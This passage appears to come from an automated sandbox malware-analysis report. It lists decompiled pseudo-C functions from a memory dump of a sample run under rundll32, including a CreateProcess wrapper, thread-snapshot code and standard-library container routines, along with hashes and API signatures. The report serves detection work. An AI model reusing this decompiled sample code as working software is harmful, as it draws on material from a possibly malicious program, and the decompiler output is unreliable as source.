                0x215205f6c1c
                0x215205f6c2a
                0x215205f6c33
                0x215205f6c45
                0x215205f6c4e
                0x215205f6c50
                0x215205f6c56
                0x215205f6c5c
                0x215205f6c7f

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockitstd::locale::_$Locimp::_$LocimpLockit::_Lockit::~_$Locinfo::_New_$AddfacGetcvtInitLocimp_Locinfo_ctorLocinfo_dtorSetgloballocale
                • String ID:
                • API String ID: 1918534443-0
                • Opcode ID: 278c38eeb202807922060e252e777835c6e01d8cf4eee63a8b468e00d0f92009
                • Instruction ID: dbbccf0dc3214853c92b4a447659d4852e5398513f42a937cf5300d59ea7590e
                • Opcode Fuzzy Hash: 278c38eeb202807922060e252e777835c6e01d8cf4eee63a8b468e00d0f92009
                • Instruction Fuzzy Hash: 2E216732602E90C5EB109F51E8583D9B3A4EBE5BD0F1482A6EE9D4779DDF38D8468700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205C7750 Relevance: 9.1, APIs: 6, Instructions: 65threadprocessCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CreateOpenThread32$CloseFirstHandleInstanceNextProcessSnapshotThreadToolhelp32
                • String ID:
                • API String ID: 684471368-0
                • Opcode ID: a37325f4b4b5c4bf5b81cf8654252723e457ad972ae9de76c6c9a21dc636ce4e
                • Instruction ID: da8c6e3beb6df53fe3ad06a049c1726f38c5a93bbe76f10d5b9370af3dc19def
                • Opcode Fuzzy Hash: a37325f4b4b5c4bf5b81cf8654252723e457ad972ae9de76c6c9a21dc636ce4e
                • Instruction Fuzzy Hash: 1C217A33716B54CAE750CF26A84869AB3A1FBD8B90F0850A4EF8947B69DF38D541CB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205F7090 Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _com_issue_error$AllocByteCharErrorLastMultiStringWide
                • String ID:
                • API String ID: 1412949955-0
                • Opcode ID: b63a3a2545f677ecc4ef4efd726bcd1bcedc8c36886d6ae56f796625dbe73bcb
                • Instruction ID: 79ec4f10976f9e34cba58893d6979de727da1107e8093b41a6d8ba1955f2c7e5
                • Opcode Fuzzy Hash: b63a3a2545f677ecc4ef4efd726bcd1bcedc8c36886d6ae56f796625dbe73bcb
                • Instruction Fuzzy Hash: 3F118F33301AA8C9EB189F32951D3E82395AFF6BD8F14445AAE4997B9ECE7CC4518341
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205BDD20 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 177processCOMMON
                Download Yara Rule
                C-Code - Quality: 31%
                			E00000215215205BDD20(void* __ecx, void* __edx, long long __rbx, long long __rcx, long long* __rdx) {
				void* __rsi;
				void* __rbp;
				void* __r14;
				void* __r15;
				int _t93;
				void* _t109;
				long long _t116;
				long long _t117;
				long long _t118;
				long long _t119;
				intOrPtr _t126;
				void* _t152;
				void* _t154;
				void* _t157;
				void* _t158;
				void* _t160;
				void* _t161;
				void* _t178;
				intOrPtr* _t179;
				long long _t181;
				void* _t183;
				long long* _t184;
				void* _t186;
				long long _t187;

				_t110 = __edx;
				_t109 = __ecx;
				 *((long long*)(_t160 + 0x10)) = __rdx;
				_t158 = _t160 - 0xa0;
				_t161 = _t160 - 0x1a0;
				 *((long long*)(_t158 - 0x18)) = 0xfffffffe;
				 *((long long*)(_t161 + 0x1f8)) = __rbx;
				_t184 = __rdx;
				_t187 = __rcx;
				r13d = 0;
				 *((intOrPtr*)(_t161 + 0x50)) = r13d;
				 *((long long*)(_t158 + 0xe0)) = __rcx;
				E00000215215205C0000(__rbx,  *((intOrPtr*)(__rcx + 0xd8)), _t158 + 0xe0, _t154, _t158);
				_t179 = _t187 + 0x80;
				if ( *_t179 == r13d) goto 0x205bde34;
				_t126 =  *((intOrPtr*)( *((intOrPtr*)(_t187 + 0xd8)) + 8));
				_t116 =  *((intOrPtr*)(_t126 + 8));
				 *((long long*)(_t158 - 0x60)) = _t116;
				 *((long long*)(_t158 - 0x58)) = _t116;
				 *((long long*)(_t158 - 0x50)) = _t181;
				E00000215215205B9960(__edx, _t116, _t126, _t158 + 0x50, _t158,  *((intOrPtr*)(_t116 + 0x10)) + 0x68, _t158 - 0x60, __rdx, _t187, _t186, _t183);
				_t117 =  *((intOrPtr*)(_t126 + 0x10));
				 *((long long*)(_t158 - 0x48)) = _t117;
				 *((long long*)(_t158 - 0x40)) = _t117;
				 *((long long*)(_t158 - 0x38)) = _t181;
				E00000215215205B9960(_t110, _t117, _t126, _t158 + 0x68, _t158,  *((intOrPtr*)(_t117 + 0x10)) + 0x68, _t158 - 0x48, __rdx, _t187, _t181, _t178);
				_t118 =  *((intOrPtr*)(_t126 + 0x18));
				 *((long long*)(_t158 - 0x30)) = _t118;
				 *((long long*)(_t158 - 0x28)) = _t118;
				 *((long long*)(_t158 - 0x20)) = _t181;
				E00000215215205B9960(_t110, _t118, _t126, _t158 + 0x80, _t158,  *((intOrPtr*)(_t118 + 0x10)) + 8, _t158 - 0x30, __rdx, _t187, _t152, _t154);
				 *__rdx = _t181;
				 *((long long*)(__rdx + 8)) = _t181;
				 *((long long*)(__rdx + 0x10)) = _t181;
				E00000215215205BC940(_t118, __rdx + 0x18, _t158 + 0x80, _t157);
				 *((short*)(__rdx + 0x28)) = 1;
				 *((intOrPtr*)(_t161 + 0x50)) = 1;
				goto 0x205be023;
				_t119 =  *((intOrPtr*)(_t187 + 0x78));
				 *((long long*)(_t161 + 0x48)) = _t187 + 0xe0;
				 *((long long*)(_t161 + 0x40)) = _t119;
				 *((long long*)(_t161 + 0x38)) =  *((intOrPtr*)(_t187 + 0xb8));
				 *((long long*)(_t161 + 0x30)) =  *((intOrPtr*)(_t187 + 0xd0));
				 *((intOrPtr*)(_t161 + 0x28)) =  *_t187;
				 *((intOrPtr*)(_t161 + 0x20)) =  *((intOrPtr*)(_t187 + 0xb0));
				_t93 = CreateProcessA(??, ??, ??, ??, ??, ??, ??, ??, ??, ??);
				asm("movups xmm1, [esi]");
				asm("movdqu [ebp-0x10], xmm1");
				asm("movsd xmm0, [esi+0x10]");
				asm("movsd [ebp], xmm0");
				asm("movups [esp+0x58], xmm1");
				asm("movsd [esp+0x68], xmm0");
				asm("movdqa xmm0, [0x84874]");
				asm("movdqu [ebp-0x10], xmm0");
				asm("xorps xmm0, xmm0");
				asm("movdqu [esp+0x70], xmm0");
				if ( *((intOrPtr*)(_t187 + 0x98)) == 0) goto 0x205bdee2;
				asm("lock inc ecx");
				E00000215215205A1690(_t126, _t161 + 0x70,  *((intOrPtr*)(_t187 + 0x90)), _t187 + 0xe0, _t158,  *((intOrPtr*)(_t187 + 0x98)), __rdx);
				 *(_t158 - 0x80) = 1;
				CloseHandle(??);
				CloseHandle(??);
				if (_t93 == 0) goto 0x205bdfe2;
				 *_t179 = r13d;
				E00000215215205BC080(_t161 + 0x00000070 | 0xffffffffffffffff,  *((intOrPtr*)(_t187 + 0x90)));
				 *((long long*)(_t179 + 8)) = _t119;
				 *((long long*)(_t158 + 0xf0)) = _t187;
				E00000215215205C0100(_t126,  *((intOrPtr*)(_t187 + 0xd8)), _t158 + 0xf0);
				if ( *_t179 == 0) goto 0x205bdf8e;
				 *((long long*)(_t158 - 0x70)) = _t187;
				 *((long long*)(_t158 - 0x68)) = _t179;
				asm("movaps xmm0, [ebp-0x70]");
				asm("movdqa [ebp+0x30], xmm0");
				E00000215215205BE660( *_t179, _t119,  *((intOrPtr*)(_t187 + 0xd8)));
				 *_t184 = _t181;
				 *((long long*)(_t184 + 8)) = _t181;
				 *((long long*)(_t184 + 0x10)) = _t181;
				E00000215215205BC940(_t119, _t184 + 0x18, _t158 + 0xf0);
				 *((short*)(_t184 + 0x28)) = 1;
				 *((intOrPtr*)(_t161 + 0x50)) = 1;
				E00000215215205BA460(_t119, _t126, _t161 + 0x58, _t187 + 0xe0);
				goto 0x205be023;
				asm("movups xmm0, [esp+0x58]");
				asm("inc ecx");
				asm("movsd xmm1, [esp+0x68]");
				asm("repne inc ecx");
				asm("movdqa xmm0, [0x84785]");
				asm("movdqu [esp+0x58], xmm0");
				 *((long long*)(_t184 + 0x18)) =  *(_t161 + 0x70);
				 *((long long*)(_t184 + 0x20)) =  *((intOrPtr*)(_t161 + 0x78));
				asm("xorps xmm0, xmm0");
				asm("movdqu [esp+0x70], xmm0");
				 *((char*)(_t184 + 0x28)) =  *(_t158 - 0x80) & 0x000000ff;
				 *((char*)(_t184 + 0x29)) =  *(_t158 - 0x7f) & 0x000000ff;
				 *(_t158 - 0x80) = 0;
				goto 0x205bdf77;
				E00000215215205B86E0( *((intOrPtr*)(_t161 + 0x78)), _t126, _t158 + 0x40);
				asm("movups xmm0, [eax]");
				asm("movaps [ebp-0x70], xmm0");
				E00000215215205B80C0(_t109, _t110, _t126, _t158 + 8, _t158 - 0x70, _t187 + 0xe0, _t158, " CreateProcess failed");
				 *((long long*)(_t158 + 8)) = 0x2063fa28;
				return E00000215215205F9940(_t126, _t158 + 8, 0x2066bb58, _t187 + 0xe0);
			}



























                0x215205bdd20
                0x215205bdd20
                0x215205bdd20
                0x215205bdd30
                0x215205bdd38
                0x215205bdd3f
                0x215205bdd47
                0x215205bdd4f
                0x215205bdd52
                0x215205bdd55
                0x215205bdd58
                0x215205bdd5d
                0x215205bdd72
                0x215205bdd77
                0x215205bdd82
                0x215205bdd8f
                0x215205bdd93
                0x215205bdd9d
                0x215205bdda1
                0x215205bdda5
                0x215205bddb5
                0x215205bddba
                0x215205bddc4
                0x215205bddc8
                0x215205bddcc
                0x215205bdddc
                0x215205bdde1
                0x215205bddeb
                0x215205bddef
                0x215205bddf3
                0x215205bde06
                0x215205bde0b
                0x215205bde0e
                0x215205bde12
                0x215205bde1a
                0x215205bde20
                0x215205bde27
                0x215205bde2f
                0x215205bde34
                0x215205bde57
                0x215205bde5c
                0x215205bde61
                0x215205bde66
                0x215205bde6b
                0x215205bde6f
                0x215205bde8f
                0x215205bde97
                0x215205bde9a
                0x215205bde9f
                0x215205bdea4
                0x215205bdea9
                0x215205bdeae
                0x215205bdeb4
                0x215205bdebc
                0x215205bdec1
                0x215205bdec4
                0x215205bdedb
                0x215205bdedd
                0x215205bdee7
                0x215205bdeed
                0x215205bdef7
                0x215205bdf01
                0x215205bdf09
                0x215205bdf0f
                0x215205bdf13
                0x215205bdf18
                0x215205bdf1d
                0x215205bdf32
                0x215205bdf3c
                0x215205bdf3e
                0x215205bdf42
                0x215205bdf46
                0x215205bdf4a
                0x215205bdf56
                0x215205bdf5b
                0x215205bdf5e
                0x215205bdf62
                0x215205bdf6a
                0x215205bdf70
                0x215205bdf77
                0x215205bdf84
                0x215205bdf89
                0x215205bdf8e
                0x215205bdf93
                0x215205bdf97
                0x215205bdf9d
                0x215205bdfa3
                0x215205bdfab
                0x215205bdfb6
                0x215205bdfbf
                0x215205bdfc3
                0x215205bdfc6
                0x215205bdfd0
                0x215205bdfd8
                0x215205bdfdc
                0x215205bdfe0
                0x215205bdfe6
                0x215205bdfeb
                0x215205bdfee
                0x215205be001
                0x215205be00e
                0x215205be040

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseHandle$CreateErrorExceptionLastProcessThrow
                • String ID: CreateProcess failed
                • API String ID: 4160235580-2682455881
                • Opcode ID: 640137e91375ac19db5ae25c6535f8ce21ea7dfe50142579e9fc247d86508d75
                • Instruction ID: a2e0c3da26587049217128978decdd9097656ec33e8a395659d854cc199b6252
                • Opcode Fuzzy Hash: 640137e91375ac19db5ae25c6535f8ce21ea7dfe50142579e9fc247d86508d75
                • Instruction Fuzzy Hash: 6C917733A01FA0C9E310DF64E8487DE77B4FB99768F515206EE9853A99EB74C185C340
                Uniqueness

                Uniqueness Score: -1.00%

                Function 000002152058C510 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 165COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E000002152152058C510(signed int __eax, intOrPtr* __rcx) {
				intOrPtr _t44;
				signed long long _t45;
				signed long long _t49;
				signed long long _t51;
				signed long long _t53;
				unsigned long long _t55;
				intOrPtr _t59;
				void* _t62;
				intOrPtr _t66;

				_t44 =  *((intOrPtr*)(__rcx + 0x10));
				_t59 =  *((intOrPtr*)(__rcx + 8));
				_t49 = _t44 - _t59;
				_t51 = (_t49 >> 3) + (_t49 >> 3 >> 0x3f);
				if (_t51 - 1 >= 0) goto 0x2058c5c2;
				_t66 =  *__rcx;
				_t53 = (_t51 >> 3) + (_t51 >> 3 >> 0x3f);
				if (0xc71c71c7 - _t53 - 1 < 0) goto 0x2058c5c8;
				_t45 = _t44 - _t66;
				_t11 = _t53 + 1; // 0x1c71c71c71c71c8
				_t55 = (_t53 >> 3) + (_t53 >> 3 >> 0x3f);
				_t46 =  >=  ? (_t55 >> 1) + _t55 : _t45;
				_t62 =  >=  ?  >=  ? (_t55 >> 1) + _t55 : _t45 : _t11;
				goto 0x2058c700;
				return __eax * _t49 * (_t59 - _t66) * _t45;
			}












                0x2152058c523
                0x2152058c52d
                0x2152058c531
                0x2152058c542
                0x2152058c549
                0x2152058c54b
                0x2152058c56c
                0x2152058c579
                0x2152058c57b
                0x2152058c57e
                0x2152058c595
                0x2152058c5a7
                0x2152058c5ae
                0x2152058c5bd
                0x2152058c5c7

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Concurrency::cancel_current_task
                • String ID: vector<T> too long
                • API String ID: 118556049-3788999226
                • Opcode ID: 209fec1007478916acfdcb20c5a00d356bdbdf414fd75cbb4a1670f75066db18
                • Instruction ID: 7973348266ce46f2780211b4af34ba3cb03fcf464aeeb6d070caf882f7c46f02
                • Opcode Fuzzy Hash: 209fec1007478916acfdcb20c5a00d356bdbdf414fd75cbb4a1670f75066db18
                • Instruction Fuzzy Hash: 355108F3712B98C2ED14CB66E8092D96351FBA8BD0F148225DFAD4B7D9DB78D5818300
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205C0320 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 159COMMON
                Download Yara Rule
                C-Code - Quality: 86%
                			E00000215215205C0320(signed char __ecx, void* __rcx, long long __rdi, long long __rsi, long long __r12, long long __r13, long long __r14, long long __r15) {
				void* _t47;
				signed char _t49;
				void* _t52;
				void* _t53;
				void* _t54;
				void* _t58;
				long long _t76;
				signed long long _t77;
				intOrPtr _t79;
				void* _t80;
				void* _t81;
				signed long long _t83;
				intOrPtr _t85;
				signed long long _t86;
				signed int _t87;
				intOrPtr _t96;
				void* _t97;
				void* _t120;
				void* _t121;
				long long _t140;
				signed long long _t144;

				_t49 = __ecx;
				_t120 = __rcx;
				_t85 =  *((intOrPtr*)(__rcx + 0x10));
				_t81 =  !=  ? _t85 : _t80;
				if (_t81 - _t85 - 1 < 0) goto 0x205c0356;
				if (_t81 - 8 >= 0) goto 0x205c036a;
				_t58 = 0xffffffff - _t81 - _t81;
				if (_t58 < 0) goto 0x205c0536;
				goto 0x205c0344;
				 *((long long*)(_t121 + 0x28)) = __r14;
				_t83 = _t81 + _t81 - _t85;
				 *((long long*)(_t121 + 0x20)) = __r15;
				_t144 =  *(__rcx + 0x18) >> 4;
				_t86 = _t85 + _t83;
				if (_t58 != 0) goto 0x205c0393;
				r14d = 0;
				goto 0x205c03d8;
				if (_t86 - 0xffffffff > 0) goto 0x205c050c;
				_t87 = _t86 * 8;
				if (_t87 - 0x1000 < 0) goto 0x205c03d0;
				_t76 = _t87 + 0x27;
				if (_t76 - _t87 <= 0) goto 0x205c0512;
				E00000215215205F4DCC(_t76, _t76);
				_t7 = _t76 + 0x27; // 0x27
				 *((long long*)((_t7 & 0xffffffe0) - 8)) = _t76;
				goto 0x205c03d8;
				E00000215215205F4DCC(_t76, _t76);
				_t140 = _t76;
				 *((long long*)(_t121 + 0x50)) = __rsi;
				 *((long long*)(_t121 + 0x58)) = __rdi;
				 *((long long*)(_t121 + 0x60)) = __r12;
				_t132 = _t144 * 8;
				 *((long long*)(_t121 + 0x30)) = __r13;
				E00000215215205F7310(__ecx, _t52, _t53, _t54, _t144 * 8 + _t140,  *((intOrPtr*)(_t120 + 8)) + _t144 * 8, ( *(_t120 + 0x10) << 3) -  *((intOrPtr*)(_t120 + 8)) + _t144 * 8 +  *((intOrPtr*)(_t120 + 8)), _t144 * 8 + _t140, ( *(_t120 + 0x10) << 3) -  *((intOrPtr*)(_t120 + 8)) + _t144 * 8 +  *((intOrPtr*)(_t120 + 8)));
				if (_t144 - _t83 > 0) goto 0x205c0457;
				E00000215215205F7310(_t49, _t52, _t53, _t54, ( *(_t120 + 0x10) << 3) -  *((intOrPtr*)(_t120 + 8)) + _t144 * 8 +  *((intOrPtr*)(_t120 + 8)) + _t144 * 8 + _t140,  *((intOrPtr*)(_t120 + 8)),  *((intOrPtr*)(_t120 + 8)) -  *((intOrPtr*)(_t120 + 8)) + _t132, _t144 * 8 + _t140,  *((intOrPtr*)(_t120 + 8)) -  *((intOrPtr*)(_t120 + 8)) + _t132);
				E00000215215205F8EF0(_t49, 0, _t52, _t54,  *((intOrPtr*)(_t120 + 8)) -  *((intOrPtr*)(_t120 + 8)) + _t132 + ( *(_t120 + 0x10) << 3) -  *((intOrPtr*)(_t120 + 8)) + _t144 * 8 +  *((intOrPtr*)(_t120 + 8)) + _t144 * 8 + _t140,  *((intOrPtr*)(_t120 + 8)),  *((intOrPtr*)(_t120 + 8)) -  *((intOrPtr*)(_t120 + 8)) + _t132, _t83 - _t144 << 3);
				goto 0x205c0487;
				_t118 = _t83 * 8;
				E00000215215205F7310(_t49, _t52, _t53, _t54, _t140,  *((intOrPtr*)(_t120 + 8)),  *((intOrPtr*)(_t120 + 8)) -  *((intOrPtr*)(_t120 + 8)) + _t132, _t83 * 8, _t83 * 8);
				E00000215215205F7310(_t49, _t52, _t53, _t54, _t140, _t83 * 8 +  *((intOrPtr*)(_t120 + 8)),  *((intOrPtr*)(_t120 + 8)) - _t83 * 8 +  *((intOrPtr*)(_t120 + 8)) + _t132, _t118,  *((intOrPtr*)(_t120 + 8)) - _t83 * 8 +  *((intOrPtr*)(_t120 + 8)) + _t132);
				_t47 = E00000215215205F8EF0(_t49, 0, _t52, _t54,  *((intOrPtr*)(_t120 + 8)) - _t83 * 8 +  *((intOrPtr*)(_t120 + 8)) + _t132 + _t140, _t83 * 8 +  *((intOrPtr*)(_t120 + 8)),  *((intOrPtr*)(_t120 + 8)) - _t83 * 8 +  *((intOrPtr*)(_t120 + 8)) + _t132, _t118);
				_t96 =  *((intOrPtr*)(_t120 + 8));
				if (_t96 == 0) goto 0x205c04f3;
				_t77 =  *(_t120 + 0x10);
				if (_t77 - 0xffffffff > 0) goto 0x205c0518;
				if (_t77 * 8 - 0x1000 < 0) goto 0x205c04ee;
				if ((_t49 & 0x0000001f) != 0) goto 0x205c051e;
				_t79 =  *((intOrPtr*)(_t96 - 8));
				if (_t79 - _t96 >= 0) goto 0x205c0524;
				_t97 = _t96 - _t79;
				if (_t97 - 8 < 0) goto 0x205c052a;
				if (_t97 - 0x27 > 0) goto 0x205c0530;
				0x205f51e4();
				 *((long long*)(_t120 + 8)) = _t140;
				 *(_t120 + 0x10) =  *(_t120 + 0x10) + _t83;
				return _t47;
			}
























                0x215205c0320
                0x215205c0327
                0x215205c032f
                0x215205c0340
                0x215205c034e
                0x215205c0354
                0x215205c035c
                0x215205c035f
                0x215205c0368
                0x215205c036a
                0x215205c036f
                0x215205c0372
                0x215205c0385
                0x215205c0389
                0x215205c038c
                0x215205c038e
                0x215205c0391
                0x215205c0396
                0x215205c039c
                0x215205c03ab
                0x215205c03ad
                0x215205c03b4
                0x215205c03bd
                0x215205c03c2
                0x215205c03ca
                0x215205c03ce
                0x215205c03d0
                0x215205c03d5
                0x215205c03dc
                0x215205c03e1
                0x215205c03ea
                0x215205c03ef
                0x215205c0402
                0x215205c0414
                0x215205c0427
                0x215205c0435
                0x215205c044a
                0x215205c0455
                0x215205c0457
                0x215205c0462
                0x215205c047b
                0x215205c0489
                0x215205c048e
                0x215205c04a9
                0x215205c04ab
                0x215205c04bc
                0x215205c04cc
                0x215205c04d1
                0x215205c04d3
                0x215205c04da
                0x215205c04dc
                0x215205c04e3
                0x215205c04e9
                0x215205c04ee
                0x215205c04f8
                0x215205c04fc
                0x215205c050b

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Concurrency::cancel_current_task
                • String ID: deque<T> too long
                • API String ID: 118556049-309773918
                • Opcode ID: 0d65d9164c7f66487570ee0a705990e6b20f88b82d8624f38ea5cdcaf19dcb6c
                • Instruction ID: c91284292946446f33a4df832d1656eb34d9e7be20d4da36e7cc3c3c102b7fd9
                • Opcode Fuzzy Hash: 0d65d9164c7f66487570ee0a705990e6b20f88b82d8624f38ea5cdcaf19dcb6c
                • Instruction Fuzzy Hash: D4519B73313EA4D6EE149B61A50C3EE6351AFA9BF4F540A61AE6D07BDEDA78C1418300
                Uniqueness

                Uniqueness Score: -1.00%

                Function 000002152059DCB0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 149COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E000002152152059DCB0(void* __eax, void* __rcx, long long __rdx, void* __r8, long long __r9, long long _a16, long long _a32, long long _a40) {
				intOrPtr _t50;
				intOrPtr _t51;

				_a32 = __r9;
				_a16 = __rdx;
				if (__rcx == __r8) goto 0x2059dce6;
				_t50 =  *((intOrPtr*)(__rcx + 8));
				if (0x66666665 - _t50 - 1 < 0) goto 0x2059dd4a;
				 *((long long*)(__rcx + 8)) = _t50 + 1;
				 *((long long*)(__r8 + 8)) =  *((long long*)(__r8 + 8)) - 1;
				 *((long long*)( *((intOrPtr*)(__r9 + 8)))) = _a40;
				 *((long long*)( *((intOrPtr*)(_a40 + 8)))) = _a16;
				 *((long long*)( *((intOrPtr*)(_a16 + 8)))) = _a32;
				_t51 = _a16;
				 *((long long*)(_t51 + 8)) =  *((intOrPtr*)(_a40 + 8));
				 *((long long*)(_a40 + 8)) =  *((intOrPtr*)(_a32 + 8));
				 *((long long*)(_a32 + 8)) =  *((intOrPtr*)(_t51 + 8));
				return __eax;
			}





                0x2152059dcb0
                0x2152059dcb5
                0x2152059dcc1
                0x2152059dcc3
                0x2152059dcd8
                0x2152059dcde
                0x2152059dce2
                0x2152059dcef
                0x2152059dd00
                0x2152059dd11
                0x2152059dd19
                0x2152059dd26
                0x2152059dd38
                0x2152059dd41
                0x2152059dd49

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Concurrency::cancel_current_task$ExceptionThrowstd::bad_alloc::bad_alloc
                • String ID: list<T> too long
                • API String ID: 2386360001-4027344264
                • Opcode ID: 8c3d43a86d18826729c4a74967e66e581c383eb1c22cc10e142ec2daa4007e92
                • Instruction ID: b9dd7d885344548a09118d19e00c1a19ed3e916722a42150318d58afbad385f4
                • Opcode Fuzzy Hash: 8c3d43a86d18826729c4a74967e66e581c383eb1c22cc10e142ec2daa4007e92
                • Instruction Fuzzy Hash: 72513677302F98C1DE00DB16E488299B7A4FB98BE0F158622EE9D477A8DF78D491C700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205C0E50 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 127COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00000215215205C0E50(void* __eax, intOrPtr* __rcx) {
				intOrPtr _t18;
				intOrPtr _t21;
				signed long long _t23;
				void* _t25;
				intOrPtr _t29;
				unsigned long long _t31;

				_t29 =  *((intOrPtr*)(__rcx + 0x10));
				_t21 =  *((intOrPtr*)(__rcx + 8));
				if (_t29 - _t21 >> 5 - 1 >= 0) goto 0x205c0ec1;
				_t18 =  *__rcx;
				_t23 = _t21 - _t18 >> 5;
				if (0xffffffff - _t23 - 1 < 0) goto 0x205c0ec6;
				_t31 = _t29 - _t18 >> 5;
				_t19 =  >=  ? (_t31 >> 1) + _t31 : _t18;
				_t25 =  >=  ?  >=  ? (_t31 >> 1) + _t31 : _t18 : _t23 + 1;
				goto 0x205c0ee0;
				return __eax;
			}









                0x215205c0e54
                0x215205c0e5b
                0x215205c0e6d
                0x215205c0e6f
                0x215205c0e82
                0x215205c0e8d
                0x215205c0e95
                0x215205c0eaa
                0x215205c0eb1
                0x215205c0ebc
                0x215205c0ec5

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Concurrency::cancel_current_task$ExceptionThrowstd::bad_alloc::bad_alloc
                • String ID: vector<T> too long
                • API String ID: 2386360001-3788999226
                • Opcode ID: a7aa5a6b28ac71769eafe1970d5e215efe742c92e9207db98cb8ee0b94ba8cf7
                • Instruction ID: 5ac40ddaa0c49e99eb8c02d708aa41c6ad4ee2df785804c0a10e742d022bf366
                • Opcode Fuzzy Hash: a7aa5a6b28ac71769eafe1970d5e215efe742c92e9207db98cb8ee0b94ba8cf7
                • Instruction Fuzzy Hash: E831D5B3713FA4C1ED249B56A40C6DA6264FFA4BF0F2657659E7D077D9DA78C0828300
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205BCDF0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 112COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00000215215205BCDF0(void* __eax, intOrPtr* __rcx) {
				intOrPtr _t18;
				intOrPtr _t21;
				signed long long _t23;
				void* _t25;
				intOrPtr _t29;
				unsigned long long _t31;

				_t29 =  *((intOrPtr*)(__rcx + 0x10));
				_t21 =  *((intOrPtr*)(__rcx + 8));
				if (_t29 - _t21 >> 3 - 1 >= 0) goto 0x205bce61;
				_t18 =  *__rcx;
				_t23 = _t21 - _t18 >> 3;
				if (0xffffffff - _t23 - 1 < 0) goto 0x205bce66;
				_t31 = _t29 - _t18 >> 3;
				_t19 =  >=  ? (_t31 >> 1) + _t31 : _t18;
				_t25 =  >=  ?  >=  ? (_t31 >> 1) + _t31 : _t18 : _t23 + 1;
				goto 0x205bcf00;
				return __eax;
			}









                0x215205bcdf4
                0x215205bcdfb
                0x215205bce0d
                0x215205bce0f
                0x215205bce22
                0x215205bce2d
                0x215205bce35
                0x215205bce4a
                0x215205bce51
                0x215205bce5c
                0x215205bce65

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Concurrency::cancel_current_task
                • String ID: vector<T> too long
                • API String ID: 118556049-3788999226
                • Opcode ID: cf9c549b1c476fdb4d5ff33ebff3ea372f693d11d334e207372d9e47b2696e50
                • Instruction ID: f81c62c3d826d3220bc7a7c94fb430846bf888c28063b222cd525858ad41440d
                • Opcode Fuzzy Hash: cf9c549b1c476fdb4d5ff33ebff3ea372f693d11d334e207372d9e47b2696e50
                • Instruction Fuzzy Hash: 9831E273312E95C1D914AB65E40C2E9A661ABAABF0F5447619FBD077DDDA78E0428300
                Uniqueness

                Uniqueness Score: -1.00%

                Function 000002152059E930 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 94COMMON
                Download Yara Rule
                C-Code - Quality: 65%
                			E000002152152059E930(long long __rbx, long long __rcx, void* __r9) {
				void* __rbp;
				void* _t36;
				void* _t38;
				void* _t44;
				short _t52;
				void* _t59;
				intOrPtr* _t67;
				long long _t71;
				signed long long _t79;
				long long _t88;
				void* _t90;
				void* _t91;
				void* _t92;
				void* _t93;
				void* _t98;
				void* _t100;
				void* _t101;

				_t98 = __r9;
				_t92 = _t93 - 0x57;
				 *((long long*)(_t92 + 7)) = 0xfffffffe;
